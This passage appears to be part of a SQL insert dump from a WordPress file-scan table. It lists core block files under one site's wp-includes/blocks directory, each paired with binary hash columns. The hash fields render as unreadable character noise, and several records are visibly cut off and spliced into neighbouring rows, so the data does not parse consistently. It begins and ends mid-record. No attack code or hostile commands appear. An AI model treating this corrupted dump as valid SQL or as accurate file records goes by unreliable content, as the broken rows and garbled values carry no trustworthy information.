aniqla\nOX','',0,'?'),('#\nɰЂ','wp-includes/blocks/query-title/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']l¥ˀ3','d\"Q٥[Rf?а-[1#xr,md\r_','',0,'?'),('d1Tgb! ','wp-includes/blocks/query-title.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-b,wrˡH','ٖ~.YwAC$|\025?','',0,'?'),('TT9ܰ\nj~','wp-includes/blocks/query.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AẴ뾋j','\Zo-\r];pP%:D[','',0,'?'),('XRev OU','wp-includes/blocks/quote/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'%ŏ','s* MbI\\4|%','',0,'?'),('SI#)|','wp-includes/blocks/quote/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7WQʓ Bir','Av+@y^nY=[M|t','',0,'?'),('9yS pV6=','wp-includes/blocks/quote/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3gN%!Q|','*4k(de%chqeStD\Zu','',0,'?'),('\nP','wp-includes/blocks/quote/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(CZN(6Dm',' +6Ɛ$lw1w7V','',0,'?'),('lI\r,B8','wp-includes/blocks/quote/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bx~.\ZK8d4M','+Ja :usِK;̧}t%D','',0,'?'),('G︈g pΊ','wp-includes/blocks/quote/theme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C#ĊJM','nt 2(:h6| ,¦{UD\0I!/2','',0,'?'),(';dAo+d(','wp-includes/blocks/quote/theme-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','η=<`','OKys.S \rReAd5NJ','',0,'?'),('$*-ً ','wp-includes/blocks/quote/theme.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','86␢','ܙbi@9 \\KqL2:+ +','',0,'?'),('QP5ZwNia','wp-includes/blocks/quote/theme.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/quote/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Evb&UW{','$0 8s;_ I,u[\\N','',0,'?'),('+Hj~','wp-includes/blocks/read-more/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/read-more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5mSC00Rʳ','=CQ֎SFo_?(/NǴ+s','',0,'?'),('J?,Q6','wp-includes/blocks/read-more/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/read-more/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!uG\n=)nOt','',0,'?'),('g bf\r\Zъ','wp-includes/blocks/rss/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2 3҆ !8M','lŹpnGc jh','',0,'?'),('nJ-25W','wp-includes/blocks/rss/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ׯću','! L(L\'= ޓ\rgȀj=t','',0,'?'),('I6F','wp-includes/blocks/rss/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7bl\'Unu Ϧ','JT(1>5lrqL\\{ ','',0,'?'),('(lօ+%mGI@','wp-includes/blocks/rss/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ׯću','! L(L\'= ޓ\rgȀj=t','',0,'?'),('PZ27Mn','wp-includes/blocks/rss/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7bl\'Unu Ϧ','JT(1>5lrqL\\{ ','',0,'?'),('8jc}','wp-includes/blocks/rss/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$Tn9ƚ','ރ`2̲&A+e F¸','',0,'?'),('54ZʗHJ','wp-includes/blocks/rss/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i #\"\\W+pͲ݇؀ڧ1y','',0,'?'),('= \\vVx','wp-includes/blocks/rss/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+c{<| ','6.bE8F;]8Kr˶ӟ췊\\','',0,'?'),(' eحVMy','wp-includes/blocks/rss/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V[с1i','OOr\'(\rM2J7`ً=h','',0,'?'),(' 4B\07qoBo6','wp-includes/blocks/rss.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܴ%qw;#oG','Pd$^ѿ8=-rA/hZJ','',0,'?'),('X|_wc:j','wp-includes/blocks/search/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zaf>VeLHU','nGfe;ΨjS]o/y','',0,'?'),(' ꑉ}OaTTN.','wp-includes/blocks/search/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.$D`+#','V,;ω %+1xm+OySQ','',0,'?'),('h&\'s','wp-includes/blocks/search/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iE]Cp6\0','d;[Zݸ,:{&rz\"-cc','',0,'?'),('M3vaBcd','wp-includes/blocks/search/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.$D`+#','V,;ω %+1xm+OySQ','',0,'?'),('he-BJ_v','wp-includes/blocks/search/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iE]Cp6\0','d;[Zݸ,:{&rz\"-cc','',0,'?'),('m`5\n+ 7','wp-includes/blocks/search/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=dZa M','7Sy$6:+IFGyw','',0,'?'),('Cms\nX]KT','wp-includes/blocks/search/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=|d?S D','KG_}!Q_D*-Z','',0,'?'),('saOY,~r൭k','wp-includes/blocks/search/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\0*T Ip','Mޥ-$r#* Ts=','',0,'?'),('_ 6TNG?','wp-includes/blocks/search/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9vQptRh','\ZLk,{;-ґX{~2k','',0,'?'),(',R3Z9iG','wp-includes/blocks/search/theme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O1f43Ѽ_0','}+{Ȗ19D\0W0S(\0sj(%%p','',0,'?'),('[Y[jLjG','wp-includes/blocks/search/theme-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z嘻 S','-Nk\",[[j_t -XO','',0,'?'),('pȬES0K','wp-includes/blocks/search/theme.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O1f43Ѽ_0','}+{Ȗ19D\0W0S(\0sj(%%p','',0,'?'),('ʁ i:gy','wp-includes/blocks/search/theme.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z嘻 S','-Nk\",[[j_t -XO','',0,'?'),('Z核A@t','wp-includes/blocks/search/view.asset.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/view.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c','m%)E\' Ѓ;껞cX~n <','',0,'?'),('N:] y\nϱ','wp-includes/blocks/search/view.min.asset.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/view.min.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K8T\0I:Ag}$;','v֌yΛp\nuٛ@n;','',0,'?'),('&OZ=Ds.','wp-includes/blocks/search/view.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search/view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Ye39c&^8]','\"4]uw r$/$|A!f)','',0,'?'),('^}R V7{WI\rH','wp-includes/blocks/search.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c,dI!i6kH','smENt\0c#iWb XLuY,j','',0,'?'),('L}b&۵b','wp-includes/blocks/separator/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T`S\ZO}\0kW','G)l\'ΗbPZzDHR/n','',0,'?'),('<7vY6?','wp-includes/blocks/separator/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R4*vֶ-','$i侢\\\ny.QHt\nq','',0,'?'),('Uzcp','wp-includes/blocks/separator/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߗ\n}C1wIB4','tCeBpLk\nkreK:I','',0,'?'),(' <|Ɔ3#`}','wp-includes/blocks/separator/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R4*vֶ-','$i侢\\\ny.QHt\nq','',0,'?'),('5pުm\Z','wp-includes/blocks/separator/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߗ\n}C1wIB4','tCeBpLk\nkreK:I','',0,'?'),('?p|Ro','wp-includes/blocks/separator/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmd\n3','#Gi;2ib2l} @aR','',0,'?'),('cO@/lM','wp-includes/blocks/separator/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','煑Pxv}+\'5 ','CU[JB*SMcN^poF@zح*=','',0,'?'),('V<7Gn','wp-includes/blocks/separator/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmd\n3','#Gi;2ib2l} @aR','',0,'?'),('idܶ1\"^','wp-includes/blocks/separator/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','煑Pxv}+\'5 ','CU[JB*SMcN^poF@zح*=','',0,'?'),('H=3P;T~','wp-includes/blocks/separator/theme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EȪh','אZȽn_6{Nn;FM>un\"','',0,'?'),('@un\"','',0,'?'),('&sRX<','wp-includes/blocks/separator/theme.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/separator/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EOcm{','/`i-^3җ;BT;#\0r}:j','',0,'?'),('苼3','wp-includes/blocks/shortcode/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/shortcode/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gkɑ&2J$','õP$f\"YxoB3-n','',0,'?'),('\Z6B8ceg','wp-includes/blocks/shortcode/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/shortcode/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~mgrK2-','\"!ܡwSKD3(Y<5B4Qa^','',0,'?'),('q8O;A','wp-includes/blocks/shortcode/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/shortcode/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\1-YH','vN7PRu8\0oqW,nP','',0,'?'),('#;eO\"#[','wp-includes/blocks/shortcode/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/shortcode/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~mgrK2-','\"!ܡwSKD3(Y<5B4Qa^','',0,'?'),('3x2§h_','wp-includes/blocks/shortcode/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/shortcode/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\1-YH','vN7PRu8\0oqW,nP','',0,'?'),('NFVYC','wp-includes/blocks/shortcode.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0t ڨ.j','{bw\n~4n\"\"#.m/#1','',0,'?'),('9>7 ','wp-includes/blocks/site-logo/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/site-logo/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','錥}qT+z[![','ܡgZˍ !*Ns6%/|SQ','',0,'?'),('vџH5%','wp-includes/blocks/site-logo/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/site-logo/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q33ުoE|2','DX','wp-includes/blocks/site-logo/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/site-logo/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';, zWS$\ZZ','+\Z','wp-includes/blocks/site-tagline.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/site-tagline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2oH\"ϵ8zw ','h9DP\"ϑhff%','',0,'?'),('hOT,$(','wp-includes/blocks/site-title/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/site-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','61΍','сknAH{^ȱQa','',0,'?'),('n?< }rm\'eq c','wp-includes/blocks/site-title/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/site-title/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','agû?cW;R*','p#=SZ9߯:f=/ު\"/','',0,'?'),('EH!h%g','',0,'?'),('Hcv>]|H\'','wp-includes/blocks/site-title/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/site-title/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k]T-k','@vTZÈWpR$za','',0,'?'),(' /tj\r?#','wp-includes/blocks/site-title/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/site-title/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WVپ[C#1E','TOIA3FKed8/R>%g','',0,'?'),('7oj@J Cȿ','wp-includes/blocks/site-title.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/site-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d][uϒ,','A_*;\Z\n83C_\r','',0,'?'),('L\r %{','wp-includes/blocks/social-link/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Za[Df+','6QYDG\\h`yOq-\rmy','',0,'?'),('vr@{c{','wp-includes/blocks/social-link/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-link/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' !vw)PX\'é','Ȋbh f pCP~','',0,'?'),('a0P@a\\x-','wp-includes/blocks/social-link/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-link/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h|H?feI','=JL!<\0f/7p^W','',0,'?'),('ڸPֺ b','wp-includes/blocks/social-link/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-link/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' !vw)PX\'é','Ȋbh f pCP~','',0,'?'),('JH6KFp~','wp-includes/blocks/social-link/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-link/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h|H?feI','=JL!<\0f/7p^W','',0,'?'),('K>^[PF1h:','wp-includes/blocks/social-link.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'2˝THt9J','4 œs z惏hIUͼuo','',0,'?'),('sv ','wp-includes/blocks/social-links/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-links/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ij\'ʑ\n','\"0 9>\"yNUy?\n0','',0,'?'),('57D;TkC','wp-includes/blocks/social-links/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-links/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PST8G,0 [d','\'̗ (o5?9`,O3zYd}Pϝ','',0,'?'),('m)\raHE','wp-includes/blocks/social-links/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-links/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hr2J<~C','I6\r\n?xhG#\ZT','',0,'?'),('r&EeDq','wp-includes/blocks/social-links/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-links/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɐ!\",?&`','ȯ\rck?D] ^-fL>\0','',0,'?'),('\n 64R9','wp-includes/blocks/social-links/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-links/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e6\"7z}jI','\rP֯^N0UUow؎\';\Z','',0,'?'),('}l8\\;~','wp-includes/blocks/social-links/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-links/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#wd2g~̔','(bp`p$T1+lh)B&F','',0,'?'),('{ZV$','wp-includes/blocks/social-links/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-links/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1hnB_&F','/X]_x/@/OΛWI,','',0,'?'),('gӁ\"}H,d','wp-includes/blocks/social-links/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-links/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=3թʏ','E`. wdI@,e^\\','',0,'?'),('\ZI','wp-includes/blocks/social-links/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/social-links/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\Zܢ{fPH.','',0,'?'),('J;fPH.','',0,'?'),('>[ g3d','wp-includes/blocks/spacer/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/spacer/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؁[K١Қ','X-ؚ\"1ި\r\nJbsY|','',0,'?'),(',IpUwbA@#','wp-includes/blocks/spacer/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/spacer/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','64g1)b','SWli\"k0ML[T','',0,'?'),('Ət\Zo+ش','wp-includes/blocks/spacer/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/spacer/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','skk3zU)','u2Tz\"-g&]Vj$O>','',0,'?'),('ܰ_~h sc','wp-includes/blocks/spacer/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/spacer/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','64g1)b','SWli\"k0ML[T','',0,'?'),('\"\n4jSË','wp-includes/blocks/spacer/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/spacer/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','skk3zU)','u2Tz\"-g&]Vj$O>','',0,'?'),('^u[p}`BW1','wp-includes/blocks/table/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')}7Z +-j^ *',')\03R]Tkֱ #Q','',0,'?'),('ÇJVW]I','wp-includes/blocks/table/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/table/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Suɇli^m','<+aTw˺1@* A/','',0,'?'),(';2yTWKsa','wp-includes/blocks/table/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/table/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SïDhG\r',')O)Tڛ9ɦ5m!','',0,'?'),('\n}\'٩B39:','wp-includes/blocks/table/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/table/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GnիAĉޚS\"',':kBԉ䫲+f/\"ǔܭ b','',0,'?'),('+F4\nq\"]','wp-includes/blocks/table/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/table/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Т70sM@','h2\"]t.G%٩TX^ ','',0,'?'),('-\'fߕ?X:4\r!','wp-includes/blocks/table/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/table/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǪWO=IItX',',,','',0,'?'),('B+y\0xa$','wp-includes/blocks/table/theme-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/table/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z:@bu!WQ','ke/Q%3\r_Z”Mr','',0,'?'),('_Q|]`\Z','wp-includes/blocks/table/theme.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/table/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','汏j:Ч%U','\n03ֹagk^=>,,','',0,'?'),('4Zs.]*','wp-includes/blocks/table/theme.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/table/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z:@bu!WQ','ke/Q%3\r_Z”Mr','',0,'?'),('K|H#[x','wp-includes/blocks/tag-cloud/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/tag-cloud/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~KeL.Kǣ','gbȘ*MioU#<\rF','',0,'?'),('4qEyVS/o}','wp-includes/blocks/tag-cloud/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/tag-cloud/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':抰 y\'R\"Cc','K Jwb3PO[bge|=w֯Und0R2','',0,'?'),('e08/;t ','wp-includes/blocks/tag-cloud/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/tag-cloud/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q{OХ/','a&gBmAR[Sjzn.','',0,'?'),('QCȧ$9B)M','wp-includes/blocks/tag-cloud/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/tag-cloud/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/\\kvs\n\\>','U?e3i;eHpq\\Jy\n%꙲','',0,'?'),('E4D\'BI_#s','wp-includes/blocks/tag-cloud/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/tag-cloud/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K\Z*A,X3E','_FJ.Ȗ Y*X L0Ua\"','',0,'?'),('u:z2DQ 4','wp-includes/blocks/tag-cloud.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|j6Vs&V',' ִiCk뷁-*Q̾q3wySa','',0,'?'),('wՋ\\G&A','wp-includes/blocks/template-part/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/template-part/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n `̩S','-F \",\\ibC~g1hX\"S','',0,'?'),('>% H ','wp-includes/blocks/template-part/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/template-part/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ne*YBVsʇ2',']ge$ζ^*&HL~ ɣs','',0,'?'),('6lLX/H3X=E','wp-includes/blocks/template-part/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/template-part/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hBu}i','_o=;X#Ǘ;;1w\0u:h','',0,'?'),('8p>ĉ+(','wp-includes/blocks/template-part/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/template-part/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ne*YBVsʇ2',']ge$ζ^*&HL~ ɣs','',0,'?'),('pt@CF ','wp-includes/blocks/template-part/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/template-part/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hBu}i','_o=;X#Ǘ;;1w\0u:h','',0,'?'),('\\l/S ʨz','wp-includes/blocks/template-part/theme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/template-part/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ddlOB','&W','wp-includes/blocks/text-columns/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/text-columns/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c^*wG㐾Q','+\\1{*CG+JLv','',0,'?'),('qZ 